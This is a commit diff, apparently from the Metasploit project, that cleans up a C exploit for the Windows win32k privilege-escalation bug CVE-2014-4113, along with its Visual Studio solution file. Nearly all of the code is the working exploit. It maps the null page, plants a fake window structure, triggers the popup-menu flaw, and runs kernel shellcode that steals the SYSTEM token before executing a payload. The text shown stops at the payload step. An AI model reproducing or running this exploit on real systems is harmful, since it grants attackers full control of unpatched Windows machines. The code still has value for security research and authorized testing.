Land #4082, @OJ's cleanup and improvements for CVE-2014-4113

jvazquez-r7 2014-10-28 09:49:18 -05:00
commit c1b82bac0e
7 changed files with 439 additions and 337 deletions


@ -1,9 +1,9 @@
 
Microsoft Visual Studio Solution File, Format Version 12.00 Microsoft Visual Studio Solution File, Format Version 12.00
# Visual Studio Express 2013 for Windows Desktop # Visual Studio 2013
VisualStudioVersion = 12.0.30723.0 VisualStudioVersion = 12.0.21005.1
MinimumVisualStudioVersion = 10.0.40219.1 MinimumVisualStudioVersion = 10.0.40219.1
Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "cve-2014-4113", "cve-2014-4113\cve-2014-4113.vcxproj", "{6DDC29F1-6AC0-4D8B-AA62-E21B0D7E219B}" Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "cve-2014-4113", "cve-2014-4113\cve-2014-4113.vcxproj", "{E80F11CD-6698-492F-B4B0-1A2348A24BB0}"
EndProject EndProject
Global Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution GlobalSection(SolutionConfigurationPlatforms) = preSolution
@ -13,14 +13,14 @@ Global
Release|x64 = Release|x64 Release|x64 = Release|x64
EndGlobalSection EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution GlobalSection(ProjectConfigurationPlatforms) = postSolution
{6DDC29F1-6AC0-4D8B-AA62-E21B0D7E219B}.Debug|Win32.ActiveCfg = Debug|Win32 {E80F11CD-6698-492F-B4B0-1A2348A24BB0}.Debug|Win32.ActiveCfg = Debug|Win32
{6DDC29F1-6AC0-4D8B-AA62-E21B0D7E219B}.Debug|Win32.Build.0 = Debug|Win32 {E80F11CD-6698-492F-B4B0-1A2348A24BB0}.Debug|Win32.Build.0 = Debug|Win32
{6DDC29F1-6AC0-4D8B-AA62-E21B0D7E219B}.Debug|x64.ActiveCfg = Debug|x64 {E80F11CD-6698-492F-B4B0-1A2348A24BB0}.Debug|x64.ActiveCfg = Debug|x64
{6DDC29F1-6AC0-4D8B-AA62-E21B0D7E219B}.Debug|x64.Build.0 = Debug|x64 {E80F11CD-6698-492F-B4B0-1A2348A24BB0}.Debug|x64.Build.0 = Debug|x64
{6DDC29F1-6AC0-4D8B-AA62-E21B0D7E219B}.Release|Win32.ActiveCfg = Release|Win32 {E80F11CD-6698-492F-B4B0-1A2348A24BB0}.Release|Win32.ActiveCfg = Release|Win32
{6DDC29F1-6AC0-4D8B-AA62-E21B0D7E219B}.Release|Win32.Build.0 = Release|Win32 {E80F11CD-6698-492F-B4B0-1A2348A24BB0}.Release|Win32.Build.0 = Release|Win32
{6DDC29F1-6AC0-4D8B-AA62-E21B0D7E219B}.Release|x64.ActiveCfg = Release|x64 {E80F11CD-6698-492F-B4B0-1A2348A24BB0}.Release|x64.ActiveCfg = Release|x64
{6DDC29F1-6AC0-4D8B-AA62-E21B0D7E219B}.Release|x64.Build.0 = Release|x64 {E80F11CD-6698-492F-B4B0-1A2348A24BB0}.Release|x64.Build.0 = Release|x64
EndGlobalSection EndGlobalSection
GlobalSection(SolutionProperties) = preSolution GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE HideSolutionNode = FALSE


@ -2,6 +2,9 @@
#define REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN #define REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN
#include "../../../ReflectiveDLLInjection/dll/src/ReflectiveLoader.c" #include "../../../ReflectiveDLLInjection/dll/src/ReflectiveLoader.c"
// Uncomment this line to enable to debug output
//#define DEBUGGING
// Purloined from ntstatus.h // Purloined from ntstatus.h
#define STATUS_SUCCESS ((NTSTATUS)0x00000000L) // ntsubauth #define STATUS_SUCCESS ((NTSTATUS)0x00000000L) // ntsubauth
@ -9,23 +12,17 @@
#include <windows.h> #include <windows.h>
#undef WIN32_NO_STATUS #undef WIN32_NO_STATUS
#ifdef DEBUGGING
// only needed because of the output printf stuff when debugging
#include <stdio.h>
#endif
#ifndef _NTDEF_ #ifndef _NTDEF_
typedef __success(return >= 0) LONG NTSTATUS; typedef __success(return >= 0) LONG NTSTATUS;
typedef NTSTATUS *PNTSTATUS; typedef NTSTATUS *PNTSTATUS;
#endif #endif
#define DEBUGGING FALSE #define PTR_SIZE sizeof(UINT_PTR)
#ifdef _M_X64
typedef unsigned __int64 QWORD;
typedef QWORD *PQWORD;
#endif
int WndProcClue = 0;
int HookCallbackClue = 0;
WNDPROC lpPrevWndFunc;
DWORD MyProcessId = 0;
DWORD OffsetWindows = 0;
typedef NTSTATUS(NTAPI *lNtAllocateVirtualMemory)( typedef NTSTATUS(NTAPI *lNtAllocateVirtualMemory)(
IN HANDLE ProcessHandle, IN HANDLE ProcessHandle,
@ -34,21 +31,22 @@ typedef NTSTATUS(NTAPI *lNtAllocateVirtualMemory)(
IN PSIZE_T RegionSize, IN PSIZE_T RegionSize,
IN ULONG AllocationType, IN ULONG AllocationType,
IN ULONG Protect IN ULONG Protect
); );
typedef NTSTATUS(NTAPI *lPsLookupProcessByProcessId)( typedef NTSTATUS(NTAPI *lPsLookupProcessByProcessId)(
IN HANDLE ProcessId, IN HANDLE ProcessId,
OUT PVOID Process OUT PVOID Process
); );
typedef NTSTATUS(NTAPI *lZwQuerySystemInformation)( typedef NTSTATUS(NTAPI *lZwQuerySystemInformation)(
_In_ DWORD SystemInformationClass, _In_ DWORD SystemInformationClass,
_Inout_ PVOID SystemInformation, _Inout_ PVOID SystemInformation,
_In_ ULONG SystemInformationLength, _In_ ULONG SystemInformationLength,
_Out_opt_ PULONG ReturnLength _Out_opt_ PULONG ReturnLength
); );
typedef struct _SYSTEM_MODULE { typedef struct _SYSTEM_MODULE
{
HANDLE Reserved1; HANDLE Reserved1;
PVOID Reserved2; PVOID Reserved2;
PVOID ImageBaseAddress; PVOID ImageBaseAddress;
@ -61,44 +59,60 @@ typedef struct _SYSTEM_MODULE {
BYTE Name[256]; BYTE Name[256];
} SYSTEM_MODULE, *PSYSTEM_MODULE; } SYSTEM_MODULE, *PSYSTEM_MODULE;
typedef struct _SYSTEM_MODULE_INFORMATION
typedef struct _SYSTEM_MODULE_INFORMATION { {
ULONG ModulesCount; ULONG ModulesCount;
SYSTEM_MODULE Modules[0]; SYSTEM_MODULE Modules[0];
} SYSTEM_MODULE_INFORMATION, *PSYSTEM_MODULE_INFORMATION; } SYSTEM_MODULE_INFORMATION, *PSYSTEM_MODULE_INFORMATION;
BOOL bWndProcFlag = FALSE;
BOOL bHookCallbackFlag = FALSE;
WNDPROC lpPrevWndFunc;
DWORD dwMyProcessId = 0;
DWORD dwOffsetWindows = 0;
lPsLookupProcessByProcessId pPsLookupProcessByProcessId = NULL; lPsLookupProcessByProcessId pPsLookupProcessByProcessId = NULL;
lNtAllocateVirtualMemory pNtAllocateVirtualMemory = NULL; lNtAllocateVirtualMemory pNtAllocateVirtualMemory = NULL;
#ifdef DEBUGGING
void dprintf(char* pszFormat, ...)
{
char s_acBuf[2048];
va_list args;
va_start(args, pszFormat);
vsprintf_s(s_acBuf, sizeof(s_acBuf) - 1, pszFormat, args);
OutputDebugString(s_acBuf);
va_end(args);
}
#else
#define dprintf(...)
#endif
long CALLBACK HookCallbackTwo(HWND hWnd, UINT Msg, WPARAM wParam, LPARAM lParam) long CALLBACK hook_callback_two(HWND hWnd, UINT Msg, WPARAM wParam, LPARAM lParam)
{ {
EndMenu(); EndMenu();
return -5; return -5;
} }
LRESULT CALLBACK HookCallback(int code, WPARAM wParam, LPARAM lParam) { LRESULT CALLBACK hook_callback(int code, WPARAM wParam, LPARAM lParam)
#ifdef _M_X64 {
if (*(DWORD *)(lParam + 16) == 0x1EB && !HookCallbackClue) if (*(DWORD *)(lParam + PTR_SIZE * 2) == 0x1EB && !bHookCallbackFlag)
#else
if (*(DWORD *)(lParam + 8) == 0x1EB && !HookCallbackClue)
#endif
{ {
HookCallbackClue = 1; bHookCallbackFlag = TRUE;
if (UnhookWindowsHook(WH_CALLWNDPROC, HookCallback)) { if (UnhookWindowsHook(WH_CALLWNDPROC, hook_callback))
#ifdef _M_X64 {
lpPrevWndFunc = (WNDPROC)SetWindowLongPtr(*(HWND *)(lParam + 24), GWLP_WNDPROC, (ULONG_PTR)HookCallbackTwo); lpPrevWndFunc = (WNDPROC)SetWindowLongPtrA(*(HWND *)(lParam + PTR_SIZE * 3), GWLP_WNDPROC, (ULONG_PTR)hook_callback_two);
#else
lpPrevWndFunc = (WNDPROC)SetWindowLongA(*(HWND *)(lParam + 12), GWLP_WNDPROC, (LONG)HookCallbackTwo);
#endif
} }
} }
return CallNextHookEx(0, code, wParam, lParam); return CallNextHookEx(0, code, wParam, lParam);
} }
LRESULT CALLBACK WndProc(HWND hwnd, UINT msg, WPARAM wParam, LPARAM lParam) { LRESULT CALLBACK wnd_proc(HWND hwnd, UINT msg, WPARAM wParam, LPARAM lParam)
if (msg == 289 && WndProcClue != 1) { {
WndProcClue = 1; if (msg == 289 && !bWndProcFlag)
{
bWndProcFlag = TRUE;
PostMessageA(hwnd, 256, 40, 0); PostMessageA(hwnd, 256, 40, 0);
PostMessageA(hwnd, 256, 39, 0); PostMessageA(hwnd, 256, 39, 0);
PostMessageA(hwnd, 513, 0, 0); PostMessageA(hwnd, 513, 0, 0);
@ -106,380 +120,375 @@ LRESULT CALLBACK WndProc(HWND hwnd, UINT msg, WPARAM wParam, LPARAM lParam) {
return DefWindowProc(hwnd, msg, wParam, lParam); return DefWindowProc(hwnd, msg, wParam, lParam);
} }
DWORD_PTR __stdcall get_threadinfo_ptr(void)
{
#ifdef _M_X64 #ifdef _M_X64
QWORD MyPtiCurrent(void) { PBYTE pTeb = (PBYTE)__readgsqword(0x30);
void *teb = (void *)__readgsqword(0x30); return (DWORD_PTR)*((PDWORD_PTR)(pTeb + 0x78));
QWORD Win32ThreadInfo = (QWORD)*((PQWORD)((PBYTE)teb + 0x78));
return Win32ThreadInfo;
}
#else #else
DWORD __stdcall MyPtiCurrent() { PBYTE pTeb = (PBYTE)__readfsdword(0x18);
__asm { return (DWORD_PTR)*((PDWORD_PTR)(pTeb + 0x40));
mov eax, fs : 18h
mov eax, [eax + 40h]
}
}
#endif #endif
}
int _stdcall shellcode_ring0(int one, int two, int three, int four) { int _stdcall shellcode_ring0(int one, int two, int three, int four)
{
void *my_process_info = NULL; void *my_process_info = NULL;
void *system_info = NULL; void *system_info = NULL;
pPsLookupProcessByProcessId((HANDLE)MyProcessId, &my_process_info); pPsLookupProcessByProcessId((HANDLE)dwMyProcessId, &my_process_info);
pPsLookupProcessByProcessId((HANDLE)4, &system_info); pPsLookupProcessByProcessId((HANDLE)4, &system_info);
*(PDWORD)((PBYTE)my_process_info + OffsetWindows) = *(PDWORD)((PBYTE)system_info + OffsetWindows); *(PDWORD)((PBYTE)my_process_info + dwOffsetWindows) = *(PDWORD)((PBYTE)system_info + dwOffsetWindows);
return 0; return 0;
} }
void DWORD WINAPI execute_payload(LPVOID lpPayload)
LogMessage(char* pszFormat, ...) { {
if (DEBUGGING != TRUE) {
return;
}
static char s_acBuf[2048];
va_list args;
va_start(args, pszFormat);
vsprintf(s_acBuf, pszFormat, args);
printf("%s\n", s_acBuf);
OutputDebugString(s_acBuf);
va_end(args);
}
DWORD WINAPI ExecutePayload(LPVOID lpPayload) {
VOID(*lpCode)() = (VOID(*)())lpPayload; VOID(*lpCode)() = (VOID(*)())lpPayload;
lpCode(); lpCode();
return ERROR_SUCCESS; return ERROR_SUCCESS;
} }
void Win32kNullPage(LPVOID lpPayload) { void win32k_null_page(LPVOID lpPayload)
HWND hWnd; {
WNDCLASSA WndClass; WNDCLASSA wndClass;
LPBYTE promise_land = NULL; char szNtName[256];
HMODULE hNtdll = NULL; PVOID pNtBase;
HMODULE ntkrnl = NULL; OSVERSIONINFOA versionInfo;
NTSTATUS status;
PULONG pSystemInfoBuffer = NULL;
lZwQuerySystemInformation pZwQuerySystemInformation = NULL;
ULONG SystemInfoBufferSize = 0;
char nt_name[256];
PVOID nt_base;
OSVERSIONINFOA VersionInformation;
// Getting Windows version // Getting Windows version
LogMessage("[*] Getting Windows version..."); dprintf("[*] Getting Windows version...");
memset(&VersionInformation, 0, sizeof(OSVERSIONINFOA)); memset(&versionInfo, 0, sizeof(OSVERSIONINFOA));
VersionInformation.dwOSVersionInfoSize = 148; versionInfo.dwOSVersionInfoSize = 148;
if (!GetVersionExA(&VersionInformation)) {
LogMessage("[!] Failed to get windows version"); if (!GetVersionExA(&versionInfo))
{
dprintf("[!] Failed to get windows version");
return; return;
} }
#ifdef _M_X64 #ifdef _M_X64
if (VersionInformation.dwMajorVersion == 6 && VersionInformation.dwMinorVersion && VersionInformation.dwMinorVersion == 1) { // Ex: Windows 7 SP1 if (versionInfo.dwMajorVersion == 6 && versionInfo.dwMinorVersion && versionInfo.dwMinorVersion == 1)
LogMessage("[*] Windows 6.1 found..."); {
OffsetWindows = 0x208; // Ex: Windows 7 SP1
dprintf("[*] Windows 6.1 found...");
dwOffsetWindows = 0x208;
} }
#else #else
if (VersionInformation.dwMajorVersion == 6) { if (versionInfo.dwMajorVersion == 6)
if (VersionInformation.dwMinorVersion && VersionInformation.dwMinorVersion == 1) { // Ex: Windows 7 SP1 {
LogMessage("[*] Windows 6.1 found..."); if (versionInfo.dwMinorVersion && versionInfo.dwMinorVersion == 1)
OffsetWindows = 0xf8; {
// Ex: Windows 7 SP1
dprintf("[*] Windows 6.1 found...");
dwOffsetWindows = 0xf8;
} }
else if (!VersionInformation.dwMinorVersion) { else if (!versionInfo.dwMinorVersion)
LogMessage("[*] Windows 6.0 found..."); // Ex: Windows 2008 R2 {
OffsetWindows = 0xe0; // Ex: Windows 2008 R2
dprintf("[*] Windows 6.0 found...");
dwOffsetWindows = 0xe0;
} }
else { else
LogMessage("[!] Unsupported Windows 6.%d found, only 6.0 and 6.1 supported atm", VersionInformation.dwMinorVersion); {
dprintf("[!] Unsupported Windows 6.%d found, only 6.0 and 6.1 supported atm", versionInfo.dwMinorVersion);
return; return;
} }
} }
else if (VersionInformation.dwMajorVersion == 5) { else if (versionInfo.dwMajorVersion == 5)
if (VersionInformation.dwMinorVersion && VersionInformation.dwMinorVersion == 1) { // Ex: Windows XP SP3 {
LogMessage("[*] Windows 5.1 found..."); if (versionInfo.dwMinorVersion && versionInfo.dwMinorVersion == 1)
OffsetWindows = 0xc8; {
// Ex: Windows XP SP3
dprintf("[*] Windows 5.1 found...");
dwOffsetWindows = 0xc8;
} }
else if (VersionInformation.dwMinorVersion && VersionInformation.dwMinorVersion == 2) { // Ex: Windows 2003 SP2 else if (versionInfo.dwMinorVersion && versionInfo.dwMinorVersion == 2)
LogMessage("[*] Windows 5.2 found..."); {
OffsetWindows = 0xd8; // Ex: Windows 2003 SP2
dprintf("[*] Windows 5.2 found...");
dwOffsetWindows = 0xd8;
} }
else { else
LogMessage("[!] Unsupported Windows 5 found, only 5.1 and 5.2 supported atm"); {
dprintf("[!] Unsupported Windows 5 found, only 5.1 and 5.2 supported atm");
return; return;
} }
} }
#endif #endif
else { else
LogMessage("[!] Major Version %d found, not supported", VersionInformation.dwMajorVersion); {
dprintf("[!] Major Version %d found, not supported", versionInfo.dwMajorVersion);
return; return;
} }
// Solve symbols // Solve symbols
LogMessage("[*] Solving symbols..."); dprintf("[*] Solving symbols...");
hNtdll = LoadLibraryA("ntdll"); HMODULE hNtdll = LoadLibraryA("ntdll");
if (hNtdll == NULL) { if (hNtdll == NULL)
LogMessage("[!] Failed to Load ntdll..."); {
dprintf("[!] Failed to Load ntdll...");
return; return;
} }
pZwQuerySystemInformation = (lZwQuerySystemInformation)GetProcAddress(hNtdll, "ZwQuerySystemInformation"); lZwQuerySystemInformation pZwQuerySystemInformation = (lZwQuerySystemInformation)GetProcAddress(hNtdll, "ZwQuerySystemInformation");
if (pZwQuerySystemInformation == NULL) { if (pZwQuerySystemInformation == NULL)
LogMessage("[!] Failed to solve ZwQuerySystemInformation"); {
dprintf("[!] Failed to solve ZwQuerySystemInformation");
return; return;
} }
pNtAllocateVirtualMemory = (lNtAllocateVirtualMemory)GetProcAddress(hNtdll, "NtAllocateVirtualMemory"); pNtAllocateVirtualMemory = (lNtAllocateVirtualMemory)GetProcAddress(hNtdll, "NtAllocateVirtualMemory");
if (pNtAllocateVirtualMemory == NULL) { if (pNtAllocateVirtualMemory == NULL)
LogMessage("[!] Failed to solve NtAllocateVirtualMemory"); {
dprintf("[!] Failed to solve NtAllocateVirtualMemory");
return; return;
} }
LogMessage("[*] Requesting Kernel loaded modules..."); dprintf("[*] Requesting Kernel loaded modules...");
status = pZwQuerySystemInformation(11, &SystemInfoBufferSize, 0, &SystemInfoBufferSize); ULONG ulSystemInfoBufferSize = 0;
pZwQuerySystemInformation(11, &ulSystemInfoBufferSize, 0, &ulSystemInfoBufferSize);
if (SystemInfoBufferSize == 0) { if (ulSystemInfoBufferSize == 0)
LogMessage("[!] Requesting pZwQuerySystemInformation required length failed"); {
return; dprintf("[!] Requesting pZwQuerySystemInformation required length failed");
}
else {
LogMessage("[*] pZwQuerySystemInformation required length %d", SystemInfoBufferSize);
}
pSystemInfoBuffer = (PULONG)LocalAlloc(LMEM_ZEROINIT, SystemInfoBufferSize);
if (pSystemInfoBuffer == NULL) {
LogMessage("[!] Allocation for SystemInfo failed");
return; return;
} }
status = pZwQuerySystemInformation(11, pSystemInfoBuffer, SystemInfoBufferSize, &SystemInfoBufferSize); dprintf("[*] pZwQuerySystemInformation required length %d", ulSystemInfoBufferSize);
if (status != STATUS_SUCCESS) { PULONG pSystemInfoBuffer = (PULONG)LocalAlloc(LMEM_ZEROINIT, ulSystemInfoBufferSize);
LogMessage("[!] Requesting kernel modules through ZwQuerySystemInformation failed"); if (pSystemInfoBuffer == NULL)
{
dprintf("[!] Allocation for SystemInfo failed");
return; return;
} }
if (pZwQuerySystemInformation(11, pSystemInfoBuffer, ulSystemInfoBufferSize, &ulSystemInfoBufferSize) != STATUS_SUCCESS)
{
dprintf("[!] Requesting kernel modules through ZwQuerySystemInformation failed");
return;
}
LogMessage("[*] Parsing SYSTEM_INFO..."); dprintf("[*] Parsing SYSTEM_INFO...");
SYSTEM_MODULE_INFORMATION *smi = (SYSTEM_MODULE_INFORMATION *)pSystemInfoBuffer; SYSTEM_MODULE_INFORMATION *smi = (SYSTEM_MODULE_INFORMATION *)pSystemInfoBuffer;
LogMessage("[*] %d Kernel modules found\n", smi->ModulesCount); dprintf("[*] %d Kernel modules found", smi->ModulesCount);
memset(nt_name, 0, 256); memset(szNtName, 0, 256);
int i = 0; ULONG i = 0;
while (i < smi->ModulesCount) { while (i < smi->ModulesCount)
{
SYSTEM_MODULE *sm = (SYSTEM_MODULE *)(smi->Modules + i); SYSTEM_MODULE *sm = (SYSTEM_MODULE *)(smi->Modules + i);
LogMessage("[*] Checking module %s", sm->Name); dprintf("[*] Checking module %s", sm->Name);
if (strstr((char *)sm->Name, ".exe")) { if (strstr((char *)sm->Name, ".exe"))
{
char *start = strstr((char *)sm->Name, "nt"); char *start = strstr((char *)sm->Name, "nt");
if (start != NULL) { if (start != NULL)
nt_base = sm->ImageBaseAddress; {
strncpy_s(nt_name, 256, start, _TRUNCATE); pNtBase = sm->ImageBaseAddress;
strncpy_s(szNtName, 256, start, _TRUNCATE);
break; break;
} }
} }
i++; i++;
} }
if (nt_name == NULL) { if (szNtName == NULL)
LogMessage("[!] nt not found"); {
dprintf("[!] nt not found");
return; return;
} }
else { dprintf("[*] Good! nt found as %s at 0x%08x", szNtName, pNtBase);
LogMessage("[*] Good! nt found as %s at 0x%08x", nt_name, nt_base);
}
ntkrnl = LoadLibraryA(nt_name); HMODULE hNtKrnl = LoadLibraryA(szNtName);
LogMessage("[*] %s loaded in userspace at: %08x\n", nt_name, ntkrnl); dprintf("[*] %s loaded in userspace at: %08x", szNtName, hNtKrnl);
pPsLookupProcessByProcessId = (lPsLookupProcessByProcessId)GetProcAddress(ntkrnl, "PsLookupProcessByProcessId"); pPsLookupProcessByProcessId = (lPsLookupProcessByProcessId)GetProcAddress(hNtKrnl, "PsLookupProcessByProcessId");
if (pPsLookupProcessByProcessId == NULL) { if (pPsLookupProcessByProcessId == NULL)
LogMessage("[!] Failed to solve PsLookupProcessByProcessId\n"); {
dprintf("[!] Failed to solve PsLookupProcessByProcessId");
return; return;
} }
#ifdef _M_X64 pPsLookupProcessByProcessId = (lPsLookupProcessByProcessId)((DWORD_PTR)pNtBase + ((DWORD_PTR)pPsLookupProcessByProcessId - (DWORD_PTR)hNtKrnl));
pPsLookupProcessByProcessId = (lPsLookupProcessByProcessId)((QWORD)nt_base + ((QWORD)pPsLookupProcessByProcessId - (QWORD)ntkrnl)); dprintf("[*] pPsLookupProcessByProcessId in kernel: 0x%p", pPsLookupProcessByProcessId);
LogMessage("[*] pPsLookupProcessByProcessId in kernel: %016llx\n", pPsLookupProcessByProcessId);
#else
pPsLookupProcessByProcessId = (lPsLookupProcessByProcessId)((DWORD)nt_base + ((DWORD)pPsLookupProcessByProcessId - (DWORD)ntkrnl));
LogMessage("[*] pPsLookupProcessByProcessId in kernel: %08x\n", pPsLookupProcessByProcessId);
#endif
MyProcessId = GetCurrentProcessId(); dwMyProcessId = GetCurrentProcessId();
// Register Class // Register Class
LogMessage("[*] Registering class..."); dprintf("[*] Registering class...");
memset(&WndClass, 0, sizeof(WNDCLASSA)); memset(&wndClass, 0, sizeof(WNDCLASSA));
WndClass.lpfnWndProc = WndProc; // Called with CallWindowProc => http://msdn.microsoft.com/en-us/library/windows/desktop/ms633571(v=vs.85).aspx wndClass.lpfnWndProc = wnd_proc; // Called with CallWindowProc => http://msdn.microsoft.com/en-us/library/windows/desktop/ms633571(v=vs.85).aspx
WndClass.lpszClassName = "woqunimalegebi"; wndClass.lpszClassName = "woqunimalegebi";
if (RegisterClassA(&WndClass) == 0) { if (!RegisterClassA(&wndClass))
LogMessage("[!] RegisterClassA failed "); {
dprintf("[!] RegisterClassA failed ");
return; return;
} }
// Create Window // Create Window
LogMessage("[*] Creating window..."); dprintf("[*] Creating window...");
hWnd = CreateWindowExA(0, "woqunimalegebi", NULL, 0, -1, -1, 0, 0, NULL, NULL, NULL, NULL); HWND hWnd = CreateWindowExA(0, "woqunimalegebi", NULL, 0, -1, -1, 0, 0, NULL, NULL, NULL, NULL);
if (hWnd == NULL) { if (hWnd == NULL)
LogMessage("[!] CreateWindowExA failed"); {
dprintf("[!] CreateWindowExA failed");
return; return;
} }
// Making everything ready for exploitation... // Making everything ready for exploitation...
LogMessage("[*] Allocating null page..."); dprintf("[*] Allocating null page...");
#ifdef _M_X64 #ifdef _M_X64
ULONGLONG base_address = 0x00000000fffffffb; ULONGLONG dwBaseAddress = 0x00000000fffffffb;
#else #else
DWORD base_address = 1; DWORD dwBaseAddress = 1;
#endif #endif
SIZE_T region_size = 0x1000;
ULONG zero_bits = 0;
HANDLE current_process = NULL;
current_process = GetCurrentProcess(); SIZE_T sRegionSize = 0x1000;
ULONG ulAllocationType = MEM_RESERVE | MEM_COMMIT | MEM_TOP_DOWN;
if (pNtAllocateVirtualMemory(current_process, (LPVOID*)(&base_address), 0, &region_size, (MEM_RESERVE | MEM_COMMIT | MEM_TOP_DOWN), PAGE_EXECUTE_READWRITE) != STATUS_SUCCESS) { if (pNtAllocateVirtualMemory(GetCurrentProcess(), (LPVOID*)&dwBaseAddress, 0, &sRegionSize, ulAllocationType, PAGE_EXECUTE_READWRITE) != STATUS_SUCCESS)
LogMessage("[!] Failed to allocate null page"); {
dprintf("[!] Failed to allocate null page");
return; return;
} }
LogMessage("[*] Getting PtiCurrent..."); dprintf("[*] Getting PtiCurrent...");
#ifdef _M_X64 DWORD_PTR dwThreadInfoPtr = get_threadinfo_ptr();
ULONGLONG pti = MyPtiCurrent();
#else
DWORD pti = MyPtiCurrent();
#endif
if (pti == 0) { if (dwThreadInfoPtr == 0)
{
LoadLibrary("user32.dll"); LoadLibrary("user32.dll");
LoadLibrary("gdi32.dll"); LoadLibrary("gdi32.dll");
pti = MyPtiCurrent(); dwThreadInfoPtr = get_threadinfo_ptr();
} }
if (pti == 0) { if (dwThreadInfoPtr == 0)
LogMessage("[!] Filed to get PtiCurrent"); {
dprintf("[!] Filed to get current thread information");
return; return;
} }
else {
#ifdef _M_X64
LogMessage("[*] Good! pti 0x%016llx", pti);
#else
LogMessage("[*] Good! pti 0x%08x", pti);
#endif
}
LogMessage("[*] Creating a fake structure at NULL..."); dprintf("[*] Good! dwThreadInfoPtr 0x%p", dwThreadInfoPtr);
dprintf("[*] Creating a fake structure at NULL...");
LPVOID lpPtr = NULL;
#ifdef _M_X64 #ifdef _M_X64
void *test = NULL; (DWORD_PTR)lpPtr = 0x10000000B;
(QWORD)test = 0x10000000B; *((PDWORD_PTR)lpPtr) = dwThreadInfoPtr;
*((PQWORD)test) = pti;
/* win32k!tagWND->bServerSideWindowProc = TRUE */ /* win32k!tagWND->bServerSideWindowProc = TRUE */
(QWORD)test = 0x100000025; (DWORD_PTR)lpPtr = 0x100000025;
*((PBYTE)test) = 4; *((PBYTE)lpPtr) = 4;
/* win32k!tagWND->lpfnWndProc = &shellcode_ring0 */ /* win32k!tagWND->lpfnWndProc = &shellcode_ring0 */
(QWORD)test = 0x10000008B; (DWORD_PTR)lpPtr = 0x10000008B;
*((PQWORD)test) = &shellcode_ring0; *((PDWORD_PTR)lpPtr) = (DWORD_PTR)shellcode_ring0;
#else #else
void *test = promise_land + 3; LPBYTE lpPromisedLand = NULL;
lpPtr = lpPromisedLand + 3;
/* We need to save this check, otherwise unmapped memory will be dereferenced (blue screen) /* We need to save this check, otherwise unmapped memory will be dereferenced (blue screen)
.text:BF8B93F4 02C mov edi, _gptiCurrent .text:BF8B93F4 02C mov edi, _gptiCurrent
.text:BF8B93FA 02C cmp edi, [esi + 8]; .text:BF8B93FA 02C cmp edi, [esi + 8];
.text:BF8B93FD 02C jz loc_BF8B .text:BF8B93FD 02C jz loc_BF8B
*/ */
*(LPDWORD)test = pti; *(LPDWORD)lpPtr = dwThreadInfoPtr;
*((LPBYTE)(promise_land + 0x11)) = 0x4; *((LPBYTE)(lpPromisedLand + 0x11)) = 0x4;
test = promise_land + 0x5b; lpPtr = lpPromisedLand + 0x5b;
*(LPDWORD)test = (DWORD)shellcode_ring0; *(LPDWORD)lpPtr = (DWORD)shellcode_ring0;
#endif #endif
// Exploit! // Exploit!
LogMessage("[*] Triggering vulnerability..."); dprintf("[*] Triggering vulnerability...");
HMENU MenuOne = CreatePopupMenu(); HMENU hMenuOne = CreatePopupMenu();
if (MenuOne == NULL) { if (hMenuOne == NULL)
LogMessage("[!] First CreatePopupMenu failed"); {
dprintf("[!] First CreatePopupMenu failed");
return; return;
} }
MENUITEMINFOA MenuOneInfo; MENUITEMINFOA menuOneInfo;
memset(&MenuOneInfo, 0, sizeof(MENUITEMINFOA)); memset(&menuOneInfo, 0, sizeof(MENUITEMINFOA));
MenuOneInfo.cbSize = sizeof(MENUITEMINFOA); menuOneInfo.cbSize = sizeof(MENUITEMINFOA);
MenuOneInfo.fMask = MIIM_STRING; menuOneInfo.fMask = MIIM_STRING;
if (InsertMenuItemA(MenuOne, 0, TRUE, &MenuOneInfo) != TRUE) { if (InsertMenuItemA(hMenuOne, 0, TRUE, &menuOneInfo) != TRUE)
LogMessage("[!] First InsertMenuItemA failed"); {
DestroyMenu(MenuOne); dprintf("[!] First InsertMenuItemA failed");
DestroyMenu(hMenuOne);
return; return;
} }
HMENU MenuTwo = CreatePopupMenu(); HMENU hMenuTwo = CreatePopupMenu();
if (MenuTwo == NULL) { if (hMenuTwo == NULL)
LogMessage("[!] Second CreatePopupMenu failed"); {
DestroyMenu(MenuOne); dprintf("[!] Second CreatePopupMenu failed");
DestroyMenu(hMenuOne);
return; return;
} }
MENUITEMINFOA MenuTwoInfo; MENUITEMINFOA menuTwoInfo;
memset(&MenuTwoInfo, 0, sizeof(MENUITEMINFOA)); memset(&menuTwoInfo, 0, sizeof(MENUITEMINFOA));
MenuTwoInfo.cbSize = sizeof(MENUITEMINFOA); menuTwoInfo.cbSize = sizeof(MENUITEMINFOA);
MenuTwoInfo.fMask = (MIIM_STRING | MIIM_SUBMENU); menuTwoInfo.fMask = (MIIM_STRING | MIIM_SUBMENU);
MenuTwoInfo.dwTypeData = ""; menuTwoInfo.dwTypeData = "";
MenuTwoInfo.cch = 1; menuTwoInfo.cch = 1;
MenuTwoInfo.hSubMenu = MenuOne; menuTwoInfo.hSubMenu = hMenuOne;
if (InsertMenuItemA(MenuTwo, 0, TRUE, &MenuTwoInfo) != TRUE) {
LogMessage("[!] Second InsertMenuItemA failed"); if (InsertMenuItemA(hMenuTwo, 0, TRUE, &menuTwoInfo) != TRUE)
DestroyMenu(MenuTwo); {
DestroyMenu(MenuOne); dprintf("[!] Second InsertMenuItemA failed");
DestroyMenu(hMenuTwo);
DestroyMenu(hMenuOne);
return; return;
} }
if (SetWindowsHookExA(WH_CALLWNDPROC, HookCallback, NULL, GetCurrentThreadId()) == NULL) { if (SetWindowsHookExA(WH_CALLWNDPROC, hook_callback, NULL, GetCurrentThreadId()) == NULL)
LogMessage("[!] SetWindowsHookExA failed :-(\n"); {
DestroyMenu(MenuTwo); dprintf("[!] SetWindowsHookExA failed :-(");
DestroyMenu(MenuOne); DestroyMenu(hMenuTwo);
DestroyMenu(hMenuOne);
return; return;
} }
// 'crash' it! // 'crash' it!
TrackPopupMenu(MenuTwo, 0, -10000, -10000, 0, hWnd, NULL); TrackPopupMenu(hMenuTwo, 0, -10000, -10000, 0, hWnd, NULL);
// If everything worked process should be privileges at this point // If everything worked process should be privileges at this point
LogMessage("[!] Executing payload..."); dprintf("[!] Executing payload...");
